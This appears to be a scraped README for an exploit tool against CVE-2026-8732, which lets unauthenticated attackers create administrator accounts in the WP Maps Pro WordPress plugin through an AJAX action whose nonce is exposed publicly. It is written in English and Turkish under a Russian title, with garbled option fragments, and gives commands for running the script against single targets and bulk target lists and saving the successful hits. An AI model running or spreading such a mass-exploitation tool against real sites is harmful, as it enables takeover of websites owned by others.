
CVE-2026-8732 | WP Maps Pro <= 6.1.0 Неавторизованное создание администратора
CVE-2026-8732 is a critical vulnerability (CVSS 9.8) in the WP Maps Pro (wp-google-map-gold) WordPress plugin (version <= 6.1.0).
Unauthenticated attackers can create WordPress administrator accounts by abusing the wpgmp_temp_access_ajax AJAX action. The nonce protecting the endpoint is publicly embedded in frontend pages, rendering it ineffective as an access control mechanism.
Authors: fientix & quake
-l).-t).-o).--timeout).-v).# Single Target Scan
python CVE-2026-8732.py -u https://example.com -v
# Multi-Target Bulk Scan & Save Results
python CVE-2026-8732.py -l targets.txt -t 20 -o success.txt
# Custom Timeout (Seconds)
python CVE-2026-8732.py -l targets.txt --timeout 15
CVE-2026-8732, WP Maps Pro (wp-google-map-gold) WordPress eklentisinin <= 6.1.0 sürümlerinde bulunan kritik düzeyde (CVSS 9.8) bir zafiyettir.
Yetkisiz saldırganlar, wpgmp_temp_access_ajax AJAX eylemini kötüye kullanarak yetkisiz şekilde yönetici (admin) hesabı oluşturabilirler. İsteği koruması gereken nonce değeri ön yüzde herkese açık olarak yayınlandığından erişim kontrolü işlevini yitirmektedir.
Yazarlar: fientix & quake
-l).-t).-o).--timeout).-v).# Tek Hedef Taraması
python CVE-2026-8732.py -u https://example.com -v
# Çoklu Hedef Taraması ve Sonuçları Kaydetme
python CVE-2026-8732.py -l targets.txt -t 20 -o success.txt
# Özel Zaman Aşımı Süresi (Saniye)
python CVE-2026-8732.py -l targets.txt --timeout 15
"Thank you so much for your support on this project, @Quake-py"